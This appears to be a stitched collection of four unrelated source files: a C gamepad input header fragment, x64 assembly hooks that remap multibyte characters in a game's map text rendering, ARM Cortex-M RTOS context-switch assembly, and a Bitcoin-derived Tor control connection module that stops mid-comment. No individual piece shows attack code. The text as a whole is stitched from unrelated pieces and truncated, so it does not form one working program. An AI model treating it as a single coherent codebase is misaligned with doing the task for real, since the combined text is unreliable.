if (gamepad && v_out)
{
*v_out = gamepad->state.trigger_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggers(ijkGamepadState const* const gamepad, dbl vl_out[1], dbl vr_out[1])
{
if (gamepad && vl_out && vr_out)
{
*vl_out = gamepad->state.trigger_left_unit;
*vr_out = gamepad->state.trigger_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggerLeftChange(ijkGamepadState const* const gamepad, dbl dv_out[1])
{
if (gamepad && dv_out)
{
*dv_out = (gamepad->state.trigger_left_unit - gamepad->state_prev.trigger_left_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggerRightChange(ijkGamepadState const* const gamepad, dbl dv_out[1])
{
if (gamepad && dv_out)
{
*dv_out = (gamepad->state.trigger_right_unit - gamepad->state_prev.trigger_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggersChange(ijkGamepadState const* const gamepad, dbl dvl_out[1], dbl dvr_out[1])
{
if (gamepad && dvl_out && dvr_out)
{
*dvl_out = (gamepad->state.trigger_left_unit - gamepad->state_prev.trigger_left_unit);
*dvr_out = (gamepad->state.trigger_right_unit - gamepad->state_prev.trigger_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickLeft(ijkGamepadState const* const gamepad, dbl v_out[2])
{
if (gamepad && v_out)
{
v_out[0] = gamepad->state.thumbX_left_unit;
v_out[1] = gamepad->state.thumbY_left_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickRight(ijkGamepadState const* const gamepad, dbl v_out[2])
{
if (gamepad && v_out)
{
v_out[0] = gamepad->state.thumbX_right_unit;
v_out[1] = gamepad->state.thumbY_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbsticks(ijkGamepadState const* const gamepad, dbl vl_out[2], dbl vr_out[2])
{
if (gamepad && vl_out && vr_out)
{
vl_out[0] = gamepad->state.thumbX_left_unit;
vl_out[1] = gamepad->state.thumbY_left_unit;
vr_out[0] = gamepad->state.thumbX_right_unit;
vr_out[1] = gamepad->state.thumbY_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickLeftChange(ijkGamepadState const* const gamepad, dbl dv_out[2])
{
if (gamepad && dv_out)
{
dv_out[0] = (gamepad->state.thumbX_left_unit - gamepad->state_prev.thumbX_left_unit);
dv_out[1] = (gamepad->state.thumbY_left_unit - gamepad->state_prev.thumbY_left_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickRightChange(ijkGamepadState const* const gamepad, dbl dv_out[2])
{
if (gamepad && dv_out)
{
dv_out[0] = (gamepad->state.thumbX_right_unit - gamepad->state_prev.thumbX_right_unit);
dv_out[1] = (gamepad->state.thumbY_right_unit - gamepad->state_prev.thumbY_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbsticksChange(ijkGamepadState const* const gamepad, dbl dvl_out[2], dbl dvr_out[2])
{
if (gamepad && dvl_out && dvr_out)
{
dvl_out[0] = (gamepad->state.thumbX_left_unit - gamepad->state_prev.thumbX_left_unit);
dvl_out[1] = (gamepad->state.thumbY_left_unit - gamepad->state_prev.thumbY_left_unit);
dvr_out[0] = (gamepad->state.thumbX_right_unit - gamepad->state_prev.thumbX_right_unit);
dvr_out[1] = (gamepad->state.thumbY_right_unit - gamepad->state_prev.thumbY_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadSetID(ijkGamepadState* const gamepad, ijkGamepadID const gamepadID)
{
if (gamepad)
{
gamepad->ctrlID = gamepadID;
return ijkGamepadUpdate(gamepad);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadReset(ijkGamepadState* const gamepad)
{
ptr ijkMemorySetZero(ptr const dst, size const sz_bytes);
if (gamepad)
{
ijkMemorySetZero(gamepad->packet, (szb(gamepad->packet) + szb(gamepad->state)));
return ijk_success;
}
return ijk_fail_invalidparams;
}
//-----------------------------------------------------------------------------
#endif // !_IJK_GAMEPAD_INL_
#endif // _IJK_GAMEPAD_H_ |
EXTERN mapViewProc1ReturnAddress : QWORD
EXTERN mapViewProc2ReturnAddress : QWORD
EXTERN mapViewProc3ReturnAddress : QWORD
EXTERN mapViewProc3CallAddress : QWORD
ESCAPE_SEQ_1 = 10h
ESCAPE_SEQ_2 = 11h
ESCAPE_SEQ_3 = 12h
ESCAPE_SEQ_4 = 13h
LOW_SHIFT = 0Eh
HIGH_SHIFT = 9h
SHIFT_2 = LOW_SHIFT
SHIFT_3 = 900h
SHIFT_4 = 8F2h
NO_FONT = 98Fh
NOT_DEF = 2026h
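; Dispatch implemented by the procs below: bytes ESCAPE_SEQ_1..4 prefix a
; 16-bit code point, which is then adjusted by +0, -SHIFT_2, +SHIFT_3 or
; +SHIFT_4 respectively; any other byte is used as the code point directly.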
; temporary space for code point
.DATA
mapViewProc3TmpCharacterAddress DQ 0
.CODE
mapViewProc1 PROC
cmp byte ptr [rax+r8], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr [rax+r8], ESCAPE_SEQ_2;
jz JMP_B;
cmp byte ptr [rax+r8], ESCAPE_SEQ_3;
jz JMP_C;
cmp byte ptr [rax+r8], ESCAPE_SEQ_4;
jz JMP_D;
jmp JMP_E;
JMP_A:
movzx eax, word ptr [rax + r8 + 1];
jmp JMP_F;
JMP_B:
movzx eax, word ptr [rax + r8 + 1];
sub eax, SHIFT_2;
jmp JMP_F;
JMP_C:
movzx eax, word ptr [rax + r8 + 1];
add eax, SHIFT_3;
jmp JMP_F;
JMP_D:
movzx eax, word ptr [rax + r8 + 1];
add eax, SHIFT_4;
JMP_F:
add ebx, 2;
add r8d, 2;
movzx eax, ax;
cmp eax, NO_FONT;
ja JMP_G;
mov eax, NOT_DEF;
jmp JMP_G;
JMP_E:
movzx eax, byte ptr [rax + r8];
mov r11, qword ptr [ rdi + rax * 8];
JMP_G:
mov r11, qword ptr [ rdi + rax * 8];
;issue-161
cmp r11,0;
jnz JMP_N;
mov eax, 2dh ; -
mov r11, qword ptr [ rdi + rax * 8];
JMP_N:
mov qword ptr [rbp + 38h], r11;
movss dword ptr [rbp + 40h], xmm2
push mapViewProc1ReturnAddress;
ret;
mapViewProc1 ENDP
;-------------------------------------------;
mapViewProc2 PROC
lea r9, [r12 + 100h];
cmp byte ptr[rax + r15], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr[rax + r15], ESCAPE_SEQ_2;
jz JMP_B;
cmp byte ptr[rax + r15], ESCAPE_SEQ_3;
jz JMP_C;
cmp byte ptr[rax + r15], ESCAPE_SEQ_4;
jz JMP_D;
movzx eax, byte ptr[rax + r15];
jmp JMP_E;
JMP_A:
movzx eax, word ptr[rax + r15 + 1];
jmp JMP_F;
JMP_B:
movzx eax, word ptr[rax + r15 + 1];
sub eax, SHIFT_2;
jmp JMP_F;
JMP_C:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_3;
jmp JMP_F;
JMP_D:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_4;
JMP_F:
add esi, 2;
add r15, 2;
movzx eax, ax;
cmp eax, NO_FONT;
ja JMP_E;
JMP_G:
mov eax, NOT_DEF;
JMP_E:
mov r12, qword ptr [r9 + rax * 8];
push mapViewProc2ReturnAddress;
ret;
mapViewProc2 ENDP
;-------------------------------------------;
mapViewProc2V130 PROC
lea r9, [r12 + 120h];
cmp byte ptr[rax + r15], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr[rax + r15], ESCAPE_SEQ_2;
jz JMP_B;
cmp byte ptr[rax + r15], ESCAPE_SEQ_3;
jz JMP_C;
cmp byte ptr[rax + r15], ESCAPE_SEQ_4;
jz JMP_D;
movzx eax, byte ptr[rax + r15];
jmp JMP_E;
JMP_A:
movzx eax, word ptr[rax + r15 + 1];
jmp JMP_F;
JMP_B:
movzx eax, word ptr[rax + r15 + 1];
sub eax, SHIFT_2;
jmp JMP_F;
JMP_C:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_3;
jmp JMP_F;
JMP_D:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_4;
JMP_F:
add esi, 2;
add r15, 2;
movzx eax, ax;
cmp eax, NO_FONT;
ja JMP_E;
JMP_G:
mov eax, NOT_DEF;
JMP_E:
mov r12, qword ptr [r9 + rax * 8];
push mapViewProc2ReturnAddress;
ret;
mapViewProc2V130 ENDP
;-------------------------------------------;
mapViewProc3 PROC
mov qword ptr[rsp + 488h - 448h],0;
cmp byte ptr [rax + r15], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr [rax + r15], ESCAPE_SEQ_2;
jz JMP_A;
cmp byte ptr [rax + r15], ESCAPE_SEQ_3;
jz JMP_A;
cmp byte ptr [rax + r15], ESCAPE_SEQ_4;
jz JMP_A;
movzx r8d, byte ptr[rax + r15];
mov edx, 1;
lea rcx, qword ptr [rsp + 488h - 448h];
call mapViewProc3CallAddress;
jmp JMP_B;
JMP_A:
lea r8, qword ptr [rax + r15];
mov mapViewProc3TmpCharacterAddress, r8;
movzx r8d, byte ptr[rax + r15];
mov edx, 3; The memory is allocated as 3 bytes, but the first byte is copied 3 times.
lea rcx, qword ptr [rsp + 488h - 448h];
call mapViewProc3CallAddress;
; overwrite
mov rcx, mapViewProc3TmpCharacterAddress;
mov cx, word ptr [rcx+1];
mov word ptr [rax+1], cx;
JMP_B:
push mapViewProc3ReturnAddress;
ret;
mapViewProc3 ENDP
END |
;*******************************************************************************
; PUBLIC FUNCTIONS
;*******************************************************************************
; Functions declared in this file
PUBLIC Inc8 ; U8 Inc8(U8 *data);
PUBLIC Dec8 ; U8 Dec8(U8 *data);
PUBLIC IRQ_ENABLE_RESTORE; void IRQ_ENABLE_RESTORE(void) ;
PUBLIC IRQ_DISABLE_SAVE ; void IRQ_DISABLE_SAVE(void) ;
PUBLIC SwitchContext ; void SwitchContext(void);
PUBLIC PendSV_Handler ; void PendSV_Handler(void);
PUBLIC SetEnvironment ; void SetEnvironment(void);
EXTERN TCBRunning
EXTERN TCBNext
EXTERN OSSchedLock
;*******************************************************************************
; EQUATES
;*******************************************************************************
NVIC_INT_CTRL EQU 0xE000ED04 ; Interrupt control state register
NVIC_SYSPRI2 EQU 0xE000ED22 ; System priority register (PendSV 14)
NVIC_PENDSV_PRI EQU 0xFF ; PendSV priority value (Lowest)
NVIC_PENDSVSET EQU 0x10000000 ; Value to trigger PendSV exception
RSEG CODE:CODE(2)
thumb
;U8 Inc8(U8 *data);
Inc8
PUSH {R1}
CPSID I
LDRB R1,[R0]
ADDS R1,#1
STRB R1,[R0]
CPSIE I
SUBS R1,#1
MOVS R0,R1
POP {R1}
BX LR
;U8 Dec8 (U8 *data);
Dec8
PUSH {R1}
CPSID I
LDRB R1,[R0]
SUBS R1,#1
STRB R1,[R0]
CPSIE I
MOVS R0,R1
POP {R1}
BX LR
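; Illustrative C models of the two helpers above (the read-modify-write is
; guarded by CPSID/CPSIE):
;   U8 Inc8(U8 *data) { U8 old = *data; *data = old + 1; return old; }
;   U8 Dec8(U8 *data) { *data -= 1; return *data; }
; Note Inc8 returns the pre-increment value, Dec8 the post-decrement value.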
IRQ_ENABLE_RESTORE
CPSIE I
BX LR
IRQ_DISABLE_SAVE
CPSID I
BX LR
SetEnvironment
SUBS R0, #28
MSR PSP, R0
BX LR
; void SwitchContext(void)
SwitchContext
LDR R0, =NVIC_INT_CTRL ; Trigger the PendSV exception (causes context switch)
LDR R1, =NVIC_PENDSVSET
STR R1, [R0]
BX LR
; void PendSV_Handler(void)
PendSV_Handler
LDR R3,=TCBRunning
LDR R1,[R3] ; R1 == running tcb
LDR R2,=TCBNext
LDR R2,[R2] ; R2 == next tcb
CMP R1,R2
BEQ exitPendSV
MRS R0, PSP ; Get PSP pointer (cannot use PUSH: in an ISR, SP is the MSP)
SUBS R0,R0,#32
STR R0,[R1] ; Save orig PSP
; Store R4-R11; R0 -= regCnt * 4, so R0 is the new stack
; top pointer (addresses high->low: R11,R10,...,R5,R4)
STMIA R0!,{R4-R7} ; Save old context (R4-R7)
MOV R4,R8
MOV R5,R9
MOV R6,R10
MOV R7,R11
STMIA R0!,{R4-R7} ; Save old context (R8-R11)
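; Software-saved frame now at the stored SP (low to high address):
; [SP+0..12]=R4-R7, [SP+16..28]=R8-R11; the hardware-stacked frame
; (R0-R3,R12,LR,PC,xPSR) sits above it at the original PSP.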
popStk
STR R2, [R3] ; TCBRunning = TCBNext;
LDR R0, [R2] ; Get SP of the task being switched in.
ADDS R0, R0,#16
LDMIA R0!,{R4-R7} ; Restore new Context (R8-R11)
MOV R8,R4
MOV R9,R5
MOV R10,R6
MOV R11,R7
SUBS R0,R0,#32
LDMIA R0!,{R4-R7} ; Restore new Context (R4-R7)
ADDS R0, R0,#16
MSR PSP, R0 ; Move new stack pointer to PSP
exitPendSV
LDR R3,=OSSchedLock
MOVS R0, #0x0
STRB R0, [R3]
MOVS R0,#4
RSBS R0,R0,#0 ; =0xFFFFFFFC,Ensure exception return uses process stack
BX R0 ; Exit interrupt
END
|
// Copyright (c) 2015-2017 The Bitcoin Core developers
// Copyright (c) 2017-2018 The Toschain Core developers
// Copyright (c) 2017 The Zcash developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include <torcontrol.h>
#include <utilstrencodings.h>
#include <netbase.h>
#include <net.h>
#include <util.h>
#include <crypto/hmac_sha256.h>
#include <vector>
#include <deque>
#include <set>
#include <stdlib.h>
#include <boost/bind.hpp>
#include <boost/signals2/signal.hpp>
#include <boost/algorithm/string/split.hpp>
#include <boost/algorithm/string/classification.hpp>
#include <boost/algorithm/string/replace.hpp>
#include <event2/bufferevent.h>
#include <event2/buffer.h>
#include <event2/util.h>
#include <event2/event.h>
#include <event2/thread.h>
/** Default control port */
const std::string DEFAULT_TOR_CONTROL = "127.0.0.1:9051";
/** Tor cookie size (from control-spec.txt) */
static const int TOR_COOKIE_SIZE = 32;
/** Size of client/server nonce for SAFECOOKIE */
static const int TOR_NONCE_SIZE = 32;
/** For computing serverHash in SAFECOOKIE */
static const std::string TOR_SAFE_SERVERKEY = "Tor safe cookie authentication server-to-controller hash";
/** For computing clientHash in SAFECOOKIE */
static const std::string TOR_SAFE_CLIENTKEY = "Tor safe cookie authentication controller-to-server hash";
/** Exponential backoff configuration - initial timeout in seconds */
static const float RECONNECT_TIMEOUT_START = 1.0;
/** Exponential backoff configuration - growth factor */
static const float RECONNECT_TIMEOUT_EXP = 1.5;
/** Maximum length for lines received on TorControlConnection.
* tor-control-spec.txt mentions that there is explicitly no limit defined to line length;
* this is a belt-and-suspenders sanity limit to prevent memory exhaustion.
*/
static const int MAX_LINE_LENGTH = 100000;
/****** Low-level TorControlConnection ********/
/** Reply from Tor, can be single or multi-line */
class TorControlReply
{
public:
TorControlReply() { Clear(); }
int code;
std::vector<std::string> lines;
void Clear()
{
code = 0;
lines.clear();
}
};
/** Low-level handling for Tor control connection.
* Speaks the SMTP-like protocol as defined in torspec/control-spec.txt
*/
class TorControlConnection
{
public:
typedef std::function<void(TorControlConnection&)> ConnectionCB;
typedef std::function<void(TorControlConnection &,const TorControlReply &)> ReplyHandlerCB;
/** Create a new TorControlConnection.
*/
explicit TorControlConnection(struct event_base *base);
~TorControlConnection();
/**
* Connect to a Tor control port.
* target is address of the form host:port.
* connected is the handler that is called when connection is successfully established.
* disconnected is a handler that is called when the connection is broken.
* Return true on success.
*/
bool Connect(const std::string &target, const ConnectionCB& connected, const ConnectionCB& disconnected);
/**
* Disconnect from Tor control port.
*/
bool Disconnect();
/** Send a command, register a handler for the reply.
* A trailing CRLF is automatically added.
* Return true on success.
*/
bool Command(const std::string &cmd, const ReplyHandlerCB& reply_handler);
/** Response handlers for async replies */
boost::signals2::signal<void(TorControlConnection &,const TorControlReply &)> async_handler;
private:
/** Callback when ready for use */
std::function<void(TorControlConnection&)> connected;
/** Callback when connection lost */
std::function<void(TorControlConnection&)> disconnected;
/** Libevent event base */
struct event_base *base;
/** Connection to control socket */
struct bufferevent *b_conn;
/** Message being received */
TorControlReply message;
/** Response handlers */
std::deque<ReplyHandlerCB> reply_handlers;
/** Libevent handlers: internal */
static void readcb(struct bufferevent *bev, void *ctx);
static void eventcb(struct bufferevent *bev, short what, void *ctx);
};
TorControlConnection::TorControlConnection(struct event_base *_base):
base(_base), b_conn(nullptr)
{
}
TorControlConnection::~TorControlConnection()
{
if (b_conn)
bufferevent_free(b_conn);
}
void TorControlConnection::readcb(struct bufferevent *bev, void *ctx)
{
TorControlConnection *self = static_cast<TorControlConnection*>(ctx);
struct evbuffer *input = bufferevent_get_input(bev);
size_t n_read_out = 0;
char *line;
assert(input);
// If there is not a whole line to read, evbuffer_readln returns nullptr
while((line = evbuffer_readln(input, &n_read_out, EVBUFFER_EOL_CRLF)) != nullptr)
{
std::string s(line, n_read_out);
free(line);
if (s.size() < 4) // Short line
continue;
// <status>(-|+| )<data><CRLF>
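// e.g. "250-PROTOCOLINFO 1" (continuation line) vs "250 OK" (final line)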
self->message.code = atoi(s.substr(0,3));
self->message.lines.push_back(s.substr(4));
char ch = s[3]; // '-','+' or ' '
if (ch == ' ') {
// Final line, dispatch reply and clean up
if (self->message.code >= 600) {
// Dispatch async notifications to async handler
// Synchronous and asynchronous messages are never interleaved
self->async_handler(*self, self->message);
} else {
if (!self->reply_handlers.empty()) {
// Invoke reply handler with message
self->reply_handlers.front()(*self, self->message);
self->reply_handlers.pop_front();
} else {
LogPrint(BCLog::TOR, "tor: Received unexpected sync reply %i\n", self->message.code);
}
}
self->message.Clear();
}
}
// Check for size of buffer - protect against memory exhaustion with very long lines
// Do this after evbuffer_readln to make sure all full lines have been
// removed from the buffer. Everything left is an incomplete line.
if (evbuffer_get_length(input) > MAX_LINE_LENGTH) {
LogPrintf("tor: Disconnecting because MAX_LINE_LENGTH exceeded\n");
self->Disconnect();
}
}
void TorControlConnection::eventcb(struct bufferevent *bev, short what, void *ctx)
{
TorControlConnection *self = static_cast<TorControlConnection*>(ctx);
if (what & BEV_EVENT_CONNECTED) {
LogPrint(BCLog::TOR, "tor: Successfully connected!\n");
self->connected(*self);
} else if (what & (BEV_EVENT_EOF|BEV_EVENT_ERROR)) {
if (what & BEV_EVENT_ERROR) {
LogPrint(BCLog::TOR, "tor: Error connecting to Tor control socket\n");
} else {
LogPrint(BCLog::TOR, "tor: End of stream\n");
}
self->Disconnect();
self->disconnected(*self);
}
}
bool TorControlConnection::Connect(const std::string &target, const ConnectionCB& _connected, const ConnectionCB& _disconnected)
{
if (b_conn)
Disconnect();
// Parse target address:port
struct sockaddr_storage connect_to_addr;
int connect_to_addrlen = sizeof(connect_to_addr);
if (evutil_parse_sockaddr_port(target.c_str(),
(struct sockaddr*)&connect_to_addr, &connect_to_addrlen)<0) {
LogPrintf("tor: Error parsing socket address %s\n", target);
return false;
}
// Create a new socket, set up callbacks and enable notification bits
b_conn = bufferevent_socket_new(base, -1, BEV_OPT_CLOSE_ON_FREE);
if (!b_conn)
return false;
bufferevent_setcb(b_conn, TorControlConnection::readcb, nullptr, TorControlConnection::eventcb, this);
bufferevent_enable(b_conn, EV_READ|EV_WRITE);
this->connected = _connected;
this->disconnected = _disconnected;
// Finally, connect to target
if (bufferevent_socket_connect(b_conn, (struct sockaddr*)&connect_to_addr, connect_to_addrlen) < 0) {
LogPrintf("tor: Error connecting to address %s\n", target);
return false;
}
return true;
}
bool TorControlConnection::Disconnect()
{
if (b_conn)
bufferevent_free(b_conn);
b_conn = nullptr;
return true;
}
bool TorControlConnection::Command(const std::string &cmd, const ReplyHandlerCB& reply_handler)
{
if (!b_conn)
return false;
struct evbuffer *buf = bufferevent_get_output(b_conn);
if (!buf)
return false;
evbuffer_add(buf, cmd.data(), cmd.size());
evbuffer_add(buf, "\r\n", 2);
reply_handlers.push_back(reply_handler);
return true;
}
/****** General parsing utilities ********/
/** Split reply line in the form 'AUTH METHODS=...' into a type
* 'AUTH' and arguments 'METHODS=...'.
* Grammar is implicitly defined in https://spec.torproject.org/control-spec by
* the server reply formats for PROTOCOLINFO (S3.21) and AUTHCHALLENGE (S3.24).
*/
static std::pair<std::string,std::string> SplitTorReplyLine(const std::string &s)
{
size_t ptr=0;
std::string type;
while (ptr < s.size() && s[ptr] != ' ') {
type.push_back(s[ptr]);
++ptr;
}
if (ptr < s.size())
++ptr; // skip ' '
return make_pair(type, s.substr(ptr));
}
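// e.g. SplitTorReplyLine("AUTH METHODS=COOKIE,SAFECOOKIE") returns
// {"AUTH", "METHODS=COOKIE,SAFECOOKIE"}.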
/** Parse reply arguments in the form 'METHODS=COOKIE,SAFECOOKIE COOKIEFILE=".../control_auth_cookie"'.
* Returns a map of keys to values, or an empty map if there was an error.
* Grammar is implicitly defined in https://spec.torproject.org/control-spec by
* the server reply formats for PROTOCOLINFO (S3.21), AUTHCHALLENGE (S3.24),
* and ADD_ONION (S3.27). See also sections 2.1 and 2.3.
*/
static std::map<std::string,std::string> ParseTorReplyMapping(const std::string &s)
{
std::map<std::string,std::string> mapping;
size_t ptr=0;
while (ptr < s.size()) {
std::string key, value;
while (ptr < s.size() && s[ptr] != '=' && s[ptr] != ' ') {
key.push_back(s[ptr]);
++ptr;
}
if (ptr == s.size()) // unexpected end of line
return std::map<std::string,std::string>();
if (s[ptr] == ' ') // The remaining string is an OptArguments
break;
++ptr; // skip '='
if (ptr < s.size() && s[ptr] == '"') { // Quoted string
++ptr; // skip opening '"'
bool escape_next = false;
while (ptr < s.size() && (escape_next || s[ptr] != '"')) {
// Repeated backslashes must be interpreted as pairs
escape_next = (s[ptr] == '\\' && !escape_next);
value.push_back(s[ptr]);
++ptr;
}
if (ptr == s.size()) // unexpected end of line
return std::map<std::string,std::string>();
++ptr; // skip closing '"'
/**
* Unescape value. Per https://spec.torproject.org/control-spec section 2.1.1:
*
* For future-proofing, controller implementors MAY use the following
* rules to be compatible with buggy Tor implementations and with
* future ones that implement the spec as intended:
*
* Read \n \t \r and \0 ... \377 as C escapes.
* Treat a backslash followed by any other character as that character.
*/
std::string escaped_value;
for (size_t i = 0; i < value.size(); ++i) {
if (value[i] == '\\') {
// This will always be valid, because if the QuotedString
// ended in an odd number of backslashes, then the parser
// would already have returned above, due to a missing
// terminating double-quote.
++i;
if (value[i] == 'n') {
escaped_value.push_back('\n');
} else if (value[i] == 't') {
escaped_value.push_back('\t');
} else if (value[i] == 'r') {
escaped_value.push_back('\r');
} else if ('0' <= value[i] && value[i] <= '7') {
size_t j;
// Octal escape sequences have a limit of three octal digits,
// but terminate at the first character that is not a valid
// octal digit if encountered sooner.
for (j = 1; j < 3 && (i+j) < value.size() && '0' <= value[i+j] && value[i+j] <= '7'; ++j) {}
// Tor restricts first digit to 0-3 for three-digit octals.
// A leading digit of 4-7 would therefore be interpreted as
// a two-digit octal.
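// e.g. "\462" therefore parses as octal 46 ('&') followed by a literal '2'.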
if (j == 3 && value[i] > '3') {
j--;
}
escaped_value.push_back(strtol(value.substr(i, j).c_str(), nullptr, 8));
// Account for automatic incrementing at loop end
i += j - 1;
} else {
escaped_value.push_back(value[i]);
}
} else {
escaped_value.push_back(value[i]);
}
}
value = escaped_value;
} else { // Unquoted value. Note that values can contain '=' at will, just no spaces
while (ptr < s.size() && s[ptr] != ' ') {
value.push_back(s[ptr]);
++ptr;
}
}
if (ptr < s.size() && s[ptr] == ' ')
++ptr; // skip ' ' after key=value
mapping[key] = value;
}
return mapping;
}
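// e.g. ParseTorReplyMapping("METHODS=COOKIE COOKIEFILE=\"...\"") returns
// {{"METHODS", "COOKIE"}, {"COOKIEFILE", "..."}}, with quoted values
// unescaped per the rules above.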
/** Read full contents of a file and return them in a std::string.
* Returns a pair <status, string>.
* If an error occurred, status will be false, otherwise status will be true and the data will be returned in string.
*
* @param maxsize Puts a maximum size limit on the file that is read. If the file is larger than this, truncated data
* (with len > maxsize) will be returned.
*/
static std::pair<bool,std::string> ReadBinaryFile(const fs::path &filename, size_t maxsize=std::numeric_limits<size_t>::max())
{
FILE *f = fsbridge::fopen(filename, "rb");
if (f == nullptr)
return std::make_pair(false,"");
std::string retval;
char buffer[128];
size_t n;
while ((n=fread(buffer, 1, sizeof(buffer), f)) > 0) {
// Check for reading errors so we don't return any data if we couldn't
// read the entire file (or up to maxsize)
if (ferror(f)) {
fclose(f);
return std::make_pair(false,"");
}
retval.append(buffer, buffer+n);
if (retval.size() > maxsize)
break;
}
fclose(f);
return std::make_pair(true,retval);
}
/** Write contents of std::string to a file.
* @return true on success.
*/
static bool WriteBinaryFile(const fs::path &filename, const std::string &data)
{
FILE *f = fsbridge::fopen(filename, "wb");
if (f == nullptr)
return false;
if (fwrite(data.data(), 1, data.size(), f) != data.size()) {
fclose(f);
return false;
}
fclose(f);
return true;
}
/****** Toschain specific TorController implementation ********/
/** Controller that connects to the Tor control socket, authenticates, then creates
* and maintains an ephemeral hidden service.
*/
class TorController
{
public:
TorController(struct event_base* base, const std::string& target);
~TorController();
/** Get name of file to store private key in */
fs::path GetPrivateKeyFile();
/** Reconnect, after getting disconnected */
void Reconnect();
private:
struct event_base* base;
std::string target;
TorControlConnection conn;
std::string private_key;
std::string service_id;
bool reconnect;
struct event *reconnect_ev;
float reconnect_timeout;
CService service;
/** Cookie for SAFECOOKIE auth */
std::vector<uint8_t> cookie;
/** ClientNonce for SAFECOOKIE auth */
std::vector<uint8_t> clientNonce;
/** Callback for ADD_ONION result */
void add_onion_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback for AUTHENTICATE result */
void auth_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback for AUTHCHALLENGE result */
void authchallenge_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback for PROTOCOLINFO result */
void protocolinfo_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback after successful connection */
void connected_cb(TorControlConnection& conn);
/** Callback after connection lost or failed connection attempt */
void disconnected_cb(TorControlConnection& conn);
/** Callback for reconnect timer */
static void reconnect_cb(evutil_socket_t fd, short what, void *arg);
};
TorController::TorController(struct event_base* _base, const std::string& _target):
base(_base),
target(_target), conn(base), reconnect(true), reconnect_ev(0),
reconnect_timeout(RECONNECT_TIMEOUT_START)
{
reconnect_ev = event_new(base, -1, 0, reconnect_cb, this);
if (!reconnect_ev)
LogPrintf("tor: Failed to create event for reconnection: out of memory?\n");
// Start connection attempts immediately
if (!conn.Connect(_target, boost::bind(&TorController::connected_cb, this, _1),
boost::bind(&TorController::disconnected_cb, this, _1) )) {
LogPrintf("tor: Initiating connection to Tor control port %s failed\n", _target);
}
// Read service private key if cached
std::pair<bool,std::string> pkf = ReadBinaryFile(GetPrivateKeyFile());
if (pkf.first) {
LogPrint(BCLog::TOR, "tor: Reading cached private key from %s\n", GetPrivateKeyFile().string());
private_key = pkf.second;
}
}
TorController::~TorController()
{
if (reconnect_ev) {
event_free(reconnect_ev);
reconnect_ev = nullptr;
}
if (service.IsValid()) {
RemoveLocal(service);
}
}
void TorController::add_onion_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
LogPrint(BCLog::TOR, "tor: ADD_ONION successful\n");
for (const std::string &s : reply.lines) {
std::map<std::string,std::string> m = ParseTorReplyMapping(s);
std::map<std::string,std::string>::iterator i;
if ((i = m.find("ServiceID")) != m.end())
service_id = i->second;
if ((i = m.find("PrivateKey")) != m.end())
private_key = i->second;
}
if (service_id.empty()) {
LogPrintf("tor: Error parsing ADD_ONION parameters:\n");
for (const std::string &s : reply.lines) {
LogPrintf(" %s\n", SanitizeString(s));
}
return;
}
service = LookupNumeric(std::string(service_id+".onion").c_str(), GetListenPort());
LogPrintf("tor: Got service ID %s, advertising service %s\n", service_id, service.ToString());
if (WriteBinaryFile(GetPrivateKeyFile(), private_key)) {
LogPrint(BCLog::TOR, "tor: Cached service private key to %s\n", GetPrivateKeyFile().string());
} else {
LogPrintf("tor: Error writing service private key to %s\n", GetPrivateKeyFile().string());
}
AddLocal(service, LOCAL_MANUAL);
// ... onion requested - keep connection open
} else if (reply.code == 510) { // 510 Unrecognized command
LogPrintf("tor: Add onion failed with unrecognized command (You probably need to upgrade Tor)\n");
} else {
LogPrintf("tor: Add onion failed; error code %d\n", reply.code);
}
}
void TorController::auth_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
LogPrint(BCLog::TOR, "tor: Authentication successful\n");
// Now that we know Tor is running, set up the proxy for onion addresses
// if -onion isn't set to something else.
if (gArgs.GetArg("-onion", "") == "") {
CService resolved(LookupNumeric("127.0.0.1", 9050));
proxyType addrOnion = proxyType(resolved, true);
SetProxy(NET_TOR, addrOnion);
SetLimited(NET_TOR, false);
}
// Finally - now create the service
if (private_key.empty()) // No private key, generate one
private_key = "NEW:RSA1024"; // Explicitly request RSA1024 - see issue #9214
// Request hidden service, redirect port.
// Note that the 'virtual' port doesn't have to be the same as our internal port, but this is just a convenient
// choice. TODO: refactor the shutdown sequence some day.
_conn.Command(strprintf("ADD_ONION %s Port=%i,127.0.0.1:%i", private_key, GetListenPort(), GetListenPort()),
boost::bind(&TorController::add_onion_cb, this, _1, _2));
} else {
LogPrintf("tor: Authentication failed\n");
}
}
/** Compute Tor SAFECOOKIE response.
*
* ServerHash is computed as:
* HMAC-SHA256("Tor safe cookie authentication server-to-controller hash",
* CookieString | ClientNonce | ServerNonce)
